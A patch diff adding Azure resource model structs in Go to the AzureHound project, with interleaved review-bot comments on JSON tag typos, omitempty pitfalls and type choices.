+ // Whether boot diagnostics should be enabled on the virtual machine.
+ Enabled bool `json:"enabled,omitempty"`
+
+ // Uri of the storage account to use for placing the console output and screenshot.
+ // If storageUri is not specified while enabling boot diagnostics, managed storage will be used.
+ StorageUri string `json:"storageUri,omitempty"`
+}
diff --git a/models/azure/boot_diagnostics_instance_view.go b/models/azure/boot_diagnostics_instance_view.go
new file mode 100644
index 0000000..997c782
--- /dev/null
+++ b/models/azure/boot_diagnostics_instance_view.go
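Review bot: The exported type is spelled `BootDiagnotics` (the `s` in "Diagnostics" is missing), and the same misspelling appears in `BootDiagnoticsInstanceView` in `models/azure/boot_diagnostics_instance_view.go`. Both files are new in this commit, so renaming now to `type BootDiagnostics struct {` and `type BootDiagnosticsInstanceView struct {` avoids freezing the typo into the package API. `BootDiagnotics` also has no doc comment; `// BootDiagnostics holds the boot diagnostics settings of a virtual machine.` would match what the field comments describe.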
@@ -0,0 +1,33 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// The instance view of a virtual machine boot diagnostics.
+type BootDiagnoticsInstanceView struct {
+ // The console screenshot blob URI.
+ // NOTE: This will not be set if boot diagnostics is currently enabled with managed storage.
+ ConsoleScreenshotBlobUri string `json:"consoleScreenshotBlobUri,omitempty"`
+
+ // The serial console log blob Uri.
+ // NOTE: This will not be set if boot diagnostics is currently enabled with managed storage.
+ SerialConsoleLogBlobUri string `json:"serialConsoleLogBlobUri,omitempty"`
+
+ // The boot diagnostics status information for the VM.
+ // NOTE: It will be set only if there are errors encountered in enabling boot diagnostics.
+ Status InstanceViewStatus `json:"status,omitempty"`
+}
diff --git a/models/azure/capacity_reservation_profile.go b/models/azure/capacity_reservation_profile.go
new file mode 100644
index 0000000..5d5325d
--- /dev/null
+++ b/models/azure/capacity_reservation_profile.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// The parameters of a capacity reservation profile.
+type CapacityReservationProfile struct {
+ // Specifies the capacity reservation group resource id that should be used for allocating the virtual machine or
+ // scaleset vm instances provided enough capacity has been reserved. Please refer to
+ // https://aka.ms/CapacityReservation for more details.
+ CapacityReservationGroup SubResource `json:"capacityReservationGroup,omitempty"`
+}
diff --git a/models/azure/cloning_info.go b/models/azure/cloning_info.go
new file mode 100644
index 0000000..8d42ec0
--- /dev/null
+++ b/models/azure/cloning_info.go
@@ -0,0 +1,32 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type CloningInfo struct {
+ AppSettingsOverrides interface{} `json:"appSettingsOverrides,omitempty"`
+ CloneCustomHostNames bool `json:"cloneCustomHostNames,omitempty"`
+ CloneSourceControl bool `json:"cloneSourceControl,omitempty"`
+ ConfigureLoadBalancing bool `json:"configureLoadBalancing,omitempty"`
+ CorrelationId string `json:"correlationId,omitempty"`
+ HostingEnvironment string `json:"hostingEnvironment,omitempty"`
+ Overwrite bool `json:"overwrite,omitempty"`
+ SourceWebAppId string `json:"sourceWebAppId,omitempty"`
+ SourceWebAppLocation string `json:"sourceWebAppLocation,omitempty"`
+ TrafficManagerProfileId string `json:"trafficManagerProfileId,omitempty"`
+ TrafficManagerProfileName string `json:"trafficManagerProfileName,omitempty"`
+}
diff --git a/models/azure/common.go b/models/azure/common.go
new file mode 100644
index 0000000..5eaeb19
--- /dev/null
+++ b/models/azure/common.go
@@ -0,0 +1,45 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "encoding/json"
+
+type Response struct {
+ Context string `json:"@odata.context,omitempty"`
+ Count int `json:"@odata.count,omitempty"`
+ NextLink string `json:"@odata.nextLink,omitempty"`
+ Value []json.RawMessage `json:"value"`
+}
+
+type ErrorResponse struct {
+ Error ODataError `json:"error"`
+}
+
+type ErrorAdditionalInfo struct {
+ Info map[string]string `json:"info,omitempty"`
+ Type string `json:"type,omitempty"`
+}
+
+type ODataError struct {
+ AdditionalInfo []ErrorAdditionalInfo `json:"additionalInfo,omitempty"`
+ Code string `json:"code"`
+ Details []ODataError `json:"details,omitempty"`
+ Message string `json:"message"`
+ InnerError *ODataError `json:"innererror,omitempty"`
+ Target string `json:"target,omitempty"`
+}
diff --git a/models/azure/connection_item_properties.go b/models/azure/connection_item_properties.go
new file mode 100644
index 0000000..a691f0e
--- /dev/null
+++ b/models/azure/connection_item_properties.go
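Review bot: `ErrorAdditionalInfo.Info` is typed `map[string]string`, so decoding an error body fails with a JSON type error as soon as any value under `info` is a number, boolean or nested object. The caller would then see the decode failure instead of the service's actual error code and message. As far as I know the Azure error schema describes `info` as a free-form object, so `Info map[string]interface{}` (the file set already uses `interface{}` in `CloningInfo`) or `json.RawMessage` is the safer type. None of the four exported types in this file has a doc comment; a line each saying which API envelope they model would help.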
@@ -0,0 +1,31 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type ConnectionItemProperties struct {
+ //Properties of the private endpoint object.
+ PrivateEndpoint PrivateEndpoint `json:"privateEndpoint,omitempty"`
+
+ // Approval state of the private link connection.
+ PrivateLinkServiceConnectionState PrivateLinkServiceConnectionState `json:"privateLinkServiceConnectionState,omitempty"`
+
+ // Provisioning state of the private endpoint connection.
+ ProvisioningState enums.EndpointProvisioningState `json:"provisioningState,omitempty"`
+}
diff --git a/models/azure/connection_string_info.go b/models/azure/connection_string_info.go
new file mode 100644
index 0000000..bd3f37d
--- /dev/null
+++ b/models/azure/connection_string_info.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type ConnStringInfo struct {
+ ConnectionString string `json:"connectionString,omitempty"`
+ Name string `json:"name,omitempty"`
+ Type enums.ConnectionStringType `json:"type,omitempty"`
+}
diff --git a/models/azure/container_registry.go b/models/azure/container_registry.go
new file mode 100644
index 0000000..d476d48
--- /dev/null
+++ b/models/azure/container_registry.go
@@ -0,0 +1,49 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "strings"
+
+// Mapped according to https://learn.microsoft.com/en-us/rest/api/containerregistry/registries/get?tabs=HTTP#registry
+type ContainerRegistry struct {
+ Entity
+
+ Identity ManagedIdentity `json:"identity,omitempty"`
+ Location string `json:"location,omitempty"`
+ Name string `json:"name,omitempty"`
+ Tags map[string]string `json:"tags,omitempty"`
+ Type string `json:"type,omitempty"`
+}
+
+func (s ContainerRegistry) ResourceGroupName() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 4 {
+ return parts[4]
+ } else {
+ return ""
+ }
+}
+
+func (s ContainerRegistry) ResourceGroupId() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 5 {
+ return strings.Join(parts[:5], "/")
+ } else {
+ return ""
+ }
+}
diff --git a/models/azure/data_disk.go b/models/azure/data_disk.go
new file mode 100644
index 0000000..5c77116
--- /dev/null
+++ b/models/azure/data_disk.go
@@ -0,0 +1,95 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Describes a data disk.
+type DataDisk struct {
+ // Specifies the caching requirements.
+ // Possible values are:
+ // None
+ // ReadOnly
+ // ReadWrite
+ //
+ // Default: None for Standard storage. ReadOnly for Premium storage
+ Caching string `json:"caching,omitempty"`
+
+ // Specifies how the virtual machine should be created.
+ // Possible values are:
+ // Attach - This value is used when you are using a specialized disk to create the virtual machine.
+ // FromImage - This value is used when you are using an image to create the virtual machine. If you are using a platform image, you also use the imageReference element described above. If you are using a marketplace image, you also use the plan element previously described.
+ CreateOption string `json:"createOption,omitempty"`
+
+ // Specifies whether data disk should be deleted or detached upon VM deletion.
+ // Possible values:
+ // Delete - If this value is used, the data disk is deleted when VM is deleted.
+ // Detach - If this value is used, the data disk is retained after VM is deleted.
+ // The default value is set to detach
+ DeleteOption string `json:"deleteOption,omitempty"`
+
+ // Specifies the detach behavior to be used while detaching a disk or which is already in the process of detachment
+ // from the virtual machine.
+ // Supported values: ForceDetach
+ //
+ // ForceDetach is applicable only for managed data disks. If a previous detachment attempt of the data disk did not
+ // complete due to an unexpected failure from the virtual machine and the disk is still not released then use
+ // force-detach as a last resort option to detach the disk forcibly from the VM. All writes might not have been
+ // flushed when using this detach behavior.
+ //
+ // This feature is still in preview mode and is not supported for VirtualMachineScaleSet. To force-detach a data disk
+ // update toBeDetached to 'true' along with setting detachOption: 'ForceDetach'.
+ DetachOption string `json:"detachOption,omitempty"`
+
+ // Specifies the Read-Write IOPS for the managed disk when StorageAccountType is UltraSSD_LRS.
+ // Returned only for VirtualMachine ScaleSet VM disks. Can be updated only via updates to the
+ // VirtualMachine Scale Set.
+ DiskIOPSReadWrite int `json:"diskIOPSReadWrite,omitempty"`
+
+ // Specifies the bandwidth in MB per second for the managed disk when StorageAccountType is UltraSSD_LRS.
+ // Returned only for VirtualMachine ScaleSet VM disks. Can be updated only via updates to the
+ // VirtualMachine Scale Set.
+ DiskMBpsReadWrite int `json:"diskMBpsReadWrite,omitempty"`
+
+ // Specifies the size of an empty data disk in gigabytes.
+ // This element can be used to overwrite the size of the disk in a virtual machine image.
+ // This value cannot be larger than 1023 GB
+ DiskSizeGB int `json:"diskSizeGB,omitempty"`
+
+ // The source user image virtual hard disk. The virtual hard disk will be copied before being attached to the
+ // virtual machine. If SourceImage is provided, the destination virtual hard drive must not exist.
+ Image VirtualHardDisk `json:"image,omitempty"`
+
+ // Specifies the logical unit number of the data disk.
+ // This value is used to identify data disks within the VM and therefore must be unique for each data disk attached
+ // to a VM.
+ Lun int `json:"lun,omitempty"`
+
+ // The managed disk parameters.
+ ManagedDisk ManagedDiskParameters `json:"managedDisk,omitempty"`
+
+ // The disk name.
+ Name string `json:"name,omitempty"`
+
+ // Specifies whether the data disk is in process of detachment from the VirtualMachine/VirtualMachineScaleset.
+ ToBeDetached bool `json:"toBeDetached,omitempty"`
+
+ // The virtual hard disk.
+ Vhd VirtualHardDisk `json:"vhd,omitempty"`
+
+ // Specifies whether writeAccelerator should be enabled or disabled on the disk.
+ WriteAcceleratorEnabled bool `json:"writeAcceleratorEnabled,omitempty"`
+}
diff --git a/models/azure/datetime_timezone.go b/models/azure/datetime_timezone.go
new file mode 100644
index 0000000..426ef21
--- /dev/null
+++ b/models/azure/datetime_timezone.go
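Review bot: `Lun` is an `int` tagged `omitempty`, and the field's own comment says it identifies the data disk within the VM. A LUN of 0 is a legitimate value, yet it is dropped whenever the struct is marshalled, so the first disk is emitted with no `lun` key at all. Removing `omitempty` from this one field (`json:"lun"`) keeps the identifier intact. The type comment should also start with the name, `// DataDisk describes a data disk.`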
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Describes the date, time and time zone of a point in time.
+type DateTimeTimeZone struct {
+ // A single point of time in a combined date and time representation `{date}T{time}
+ DateTime string `json:"dateTime,omitempty"`
+
+ // Represents a time zone
+ TimeZone string `json:"timeZone,omitempty"`
+}
diff --git a/models/azure/descendant-info.go b/models/azure/descendant-info.go
new file mode 100644
index 0000000..7f2d400
--- /dev/null
+++ b/models/azure/descendant-info.go
@@ -0,0 +1,62 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// The properties of the parent management group.
+type DescendantParentGroupInfo struct {
+ // The fully qualified ID for the parent management group.
+ //
+ // For example:
+ // - /providers/Microsoft.Management/managementGroups/0000000-0000-0000-0000-000000000000
+ Id string `json:"id,omitempty"`
+}
+
+// DescendantInfoProperties describes the properties of the management group descendant.
+type DescendantInfoProperties struct {
+ // The friendly name of the management group.
+ DisplayName string `json:"display_name,omitempty"`
+
+ // The properties of the parent management group.
+ Parent DescendantParentGroupInfo `json:"parent,omitempty"`
+}
+
+// DescendantInfo is a management group descendant.
+type DescendantInfo struct {
+ // The fully qualified ID for the descendant.
+ //
+ // For example:
+ // - /providers/Microsoft.Management/managementGroups/0000000-0000-0000-0000-000000000000
+ // - /subscriptions/0000000-0000-0000-0000-000000000000
+ Id string `json:"id,omitempty"`
+
+ // The name of the descendant.
+ //
+ // For example:
+ // - 00000000-0000-0000-0000-000000000000
+ Name string `json:"name,omitempty"`
+
+ // The properties of the management group descendant.
+ Properties DescendantInfoProperties `json:"properties,omitempty"`
+
+ // The type of the resource.
+ //
+ // For example:
+ // - Microsoft.Management/managementGroups
+ // - /subscriptions
+ Type string `json:"type,omitempty"`
+}
diff --git a/models/azure/device.go b/models/azure/device.go
new file mode 100644
index 0000000..64fffe0
--- /dev/null
+++ b/models/azure/device.go
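Review bot: `DescendantInfoProperties.DisplayName` is tagged `json:"display_name,omitempty"`, the only snake_case key among the models added here. `encoding/json` matches keys case-insensitively but not across an underscore, so a `displayName` key in the response would leave this field empty with no error. If the service returns `displayName` (as the management-groups API does, to my knowledge), the tag should be `json:"displayName,omitempty"`. The file name `descendant-info.go` also uses a hyphen where the rest of the package uses underscores.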
@@ -0,0 +1,131 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/enums"
+)
+
+// Represents a device registered in the organization. Devices are created in the cloud using the Device Registration
+// Service or by Intune. They're used by conditional access policies for multi-factor authentication. These devices can
+// range from desktop and laptop machines to phones and tablets.
+// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/device?view=graph-rest-1.0
+type Device struct {
+ DirectoryObject
+
+ // true if the account is enabled; otherwise, false. Required. Default is true.
+ // Supports $filter (eq, ne, NOT, in).
+ // Only callers in Global Administrator and Cloud Device Administrator roles can set this property.
+ AccountEnabled bool `json:"accountEnabled,omitempty"`
+
+ // For internal use only. Not nullable. Supports $filter (eq, NOT, ge, le).
+ AlternativeSecurityIds []AlternativeSecurityId `json:"alternativeSecurityIds,omitempty"`
+
+ // The timestamp type represents date and time information using ISO 8601 format and is always in UTC time.
+ // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. Read-only.
+ // Supports $filter (eq, ne, NOT, ge, le) and $orderBy.
+ ApproximateLastSignInDateTime string `json:"approximateLastSignInDateTime,omitempty"`
+
+ // The timestamp when the device is no longer deemed compliant.
+ // The timestamp type represents date and time information using ISO 8601 format and is always in UTC time.
+ // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. Read-only.
+ ComplianceExpirationDateTime string `json:"complianceExpirationDateTime,omitempty"`
+
+ // Unique identifier set by Azure Device Registration Service at the time of registration.
+ // Supports $filter (eq, ne, NOT, startsWith).
+ DeviceId string `json:"deviceId,omitempty"`
+
+ // For internal use only. Set to null.
+ DeviceMetadata string `json:"deviceMetadata,omitempty"`
+
+ // For internal use only.
+ DeviceVersion int32 `json:"deviceVersion,omitempty"`
+
+ // The display name for the device.
+ // Required.
+ // Supports $filter (eq, ne, NOT, ge, le, in, startsWith), $search, and $orderBy.
+ DisplayName string `json:"displayName,omitempty"`
+
+ // Contains extension attributes 1-15 for the device.
+ // The individual extension attributes are not selectable.
+ // These properties are mastered in cloud and can be set during creation or update of a device object in Azure AD.
+ // Supports $filter (eq, NOT, startsWith).
+ ExtensionAttributes OnPremisesExtensionAttributes `json:"onPremisesExtensionAttributes,omitempty"`
+
+ // true if the device complies with Mobile Device Management (MDM) policies; otherwise, false.
+ // Read-only.
+ // This can only be updated by Intune for any device OS type or by an approved MDM app for Windows OS devices.
+ // Supports $filter (eq, ne, NOT).
+ IsCompliant bool `json:"isCompliant,omitempty"`
+
+ // true if the device is managed by a Mobile Device Management (MDM) app; otherwise, false.
+ // This can only be updated by Intune for any device OS type or by an approved MDM app for Windows OS devices.
+ // Supports $filter (eq, ne, NOT).
+ IsManaged bool `json:"isManaged,omitempty"`
+
+ // Manufacturer of the device.
+ // Read-only.
+ Manufacturer string `json:"manufacturer,omitempty"`
+
+ // Application identifier used to register device into MDM.
+ // Read-only.
+ // Supports $filter (eq, ne, NOT, startsWith).
+ MdmAppId string `json:"mdmAppId,omitempty"`
+
+ // Model of the device.
+ // Read-only.
+ Model string `json:"model,omitempty"`
+
+ // The last time at which the object was synced with the on-premises directory.
+ // The Timestamp type represents date and time information using ISO 8601 format and is always in UTC time.
+ // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z Read-only.
+ // Supports $filter (eq, ne, NOT, ge, le, in).
+ OnPremisesLastSyncDateTime string `json:"onPremisesLastSyncDateTime,omitempty"`
+
+ // true if this object is synced from an on-premises directory; false if this object was originally synced from an
+ // on-premises directory but is no longer synced; null if this object has never been synced from an on-premises
+ // directory (default).
+ // Read-only.
+ // Supports $filter (eq, ne, NOT, in).
+ OnPremisesSyncEnabled bool `json:"onPremisesSyncEnabled,omitempty"`
+
+ // The type of operating system on the device.
+ // Required.
+ // Supports $filter (eq, ne, NOT, ge, le, startsWith).
+ OperatingSystem string `json:"operatingSystem,omitempty"`
+
+ // The version of the operating system on the device.
+ // Required.
+ // Supports $filter (eq, ne, NOT, ge, le, startsWith).
+ OperatingSystemVersion string `json:"operatingSystemVersion,omitempty"`
+
+ // For internal use only.
+ // Not nullable.
+ // Supports $filter (eq, NOT, ge, le, startsWith).
+ PhysicalIds []string `json:"physicalIds,omitempty"`
+
+ // The profile type of the device.
+ ProfileType enums.DeviceProfile `json:"profileType,omitempty"`
+
+ // List of labels applied to the device by the system.
+ SystemLabels []string `json:"systemLabels,omitempty"`
+
+ // Type of trust for the joined device.
+ // Read-only.
+ TrustType enums.TrustType `json:"trustType,omitempty"`
+}
diff --git a/models/azure/diagnostics_profile.go b/models/azure/diagnostics_profile.go
new file mode 100644
index 0000000..4dcd781
--- /dev/null
+++ b/models/azure/diagnostics_profile.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Specifies the boot diagnostic settings state.
+// Minimum api-version: 2015-06-15.
+type DiagnosticsProfile struct {
+ // Boot Diagnostics is a debugging feature which allows you to view Console Output and Screenshot to diagnose VM
+ // status. You can easily view the output of your console log. Azure also enables you to see a screenshot of the VM
+ // from the hypervisor.
+ BootDiagnotics BootDiagnotics `json:"bootDiagnotics,omitempty"`
+}
diff --git a/models/azure/diff_disk_settings.go b/models/azure/diff_disk_settings.go
new file mode 100644
index 0000000..d1f7e5c
--- /dev/null
+++ b/models/azure/diff_disk_settings.go
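Review bot: `omitempty` on the plain `bool` fields of `Device` (`AccountEnabled`, `IsCompliant`, `IsManaged`, `OnPremisesSyncEnabled`) drops the key whenever the value is false, so a re-marshalled record cannot tell a disabled or non-compliant device from one where the property was never returned. The comment on `OnPremisesSyncEnabled` itself describes three states (true, false, null), which a `bool` cannot hold. If the collected output feeds posture analysis, consider pointer types here, for example `IsCompliant *bool` with the tag unchanged. The same pattern appears later in this patch on `Enabled` in `DiskEncryptionSettings`, `RequireInfrastructureEncryption` in `StorageAccountEncryptionProperties` and `HttpsOnly` in `FunctionAppProperties`.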
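Review bot: The JSON tag `bootDiagnotics` in `DiagnosticsProfile` is misspelled. The Compute API names this property `bootDiagnostics`, so decoding a VM response leaves the field at its zero value and the boot-diagnostics settings are silently lost. The tag should read `json:"bootDiagnostics,omitempty"`. The field and type name `BootDiagnotics` carry the same typo; the type is declared outside this hunk, so renaming it needs a matching change there.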
@@ -0,0 +1,36 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Describes the parameters of ephemeral disk settings that can be specified for operating system disk.
+// NOTE: The ephemeral disk settings can only be specified for managed disk.
+type DiffDiskSettings struct {
+ // Specifies the ephemeral disk settings for operating system disk.
+ Option string `json:"option,omitempty"`
+
+ // Specifies the ephemeral disk placement for operating system disk.
+ // Possible values are:
+ // - CacheDisk
+ // - ResourceDisk
+ //
+ // Default: CacheDisk if one is configured for the VM size otherwise ResourceDisk is used.
+ // Refer to VM size documentation for Windows VM at https://docs.microsoft.com/azure/virtual-machines/windows/sizes
+ // and Linux VM at https://docs.microsoft.com/azure/virtual-machines/linux/sizes to check which VM sizes exposes a
+ // cache disk.
+ Placement string `json:"placement,omitempty"`
+}
diff --git a/models/azure/directory_object.go b/models/azure/directory_object.go
new file mode 100644
index 0000000..149b62e
--- /dev/null
+++ b/models/azure/directory_object.go
@@ -0,0 +1,31 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Represents an Azure Active Directory object. The directoryObject type is the base type for many other directory entity types.
+type DirectoryObject struct {
+ // The unique identifier for the object.
+ // Note: The value is often but not exclusively a GUID (UUID v4 variant 2)
+ //
+ // Key
+ // Read-only
+ // Supports `filter` (eq,ne,NOT,in)
+ Id string `json:"id"`
+
+ Type string `json:"@odata.type,omitempty"`
+}
diff --git a/models/azure/disk_encryption_set_params.go b/models/azure/disk_encryption_set_params.go
new file mode 100644
index 0000000..90f7368
--- /dev/null
+++ b/models/azure/disk_encryption_set_params.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Describes the parameter of customer managed disk encryption set resource id that can be specified for disk.
+// NOTE: The disk encryption set resource id can only be specified for managed disk.
+// Please refer https://aka.ms/mdssewithcmkoverview for more details.
+type DiskEncryptionSetParameters struct {
+ // Resource ID.
+ Id string `json:"id,omitempty"`
+}
diff --git a/models/azure/disk_encryption_settings.go b/models/azure/disk_encryption_settings.go
new file mode 100644
index 0000000..9a2f627
--- /dev/null
+++ b/models/azure/disk_encryption_settings.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Describes an encryption setting for a disk
+type DiskEncryptionSettings struct {
+ // Specifies the location of the disk encryption key, which is a Key Vault Secret.
+ DiskEncryptionKey KeyVaultSecretReference `json:"diskEncryptionKey,omitempty"`
+
+ // Specifies whether disk encryption should be enabled on the virtual machine.
+ Enabled bool `json:"enabled,omitempty"`
+
+ // Specifies the location of the key encryption key in Key Vault.
+ KeyEncryptionKey KeyVaultKeyReference `json:"keyEncryptionKey,omitempty"`
+}
diff --git a/models/azure/disk_instance_view.go b/models/azure/disk_instance_view.go
new file mode 100644
index 0000000..400bd75
--- /dev/null
+++ b/models/azure/disk_instance_view.go
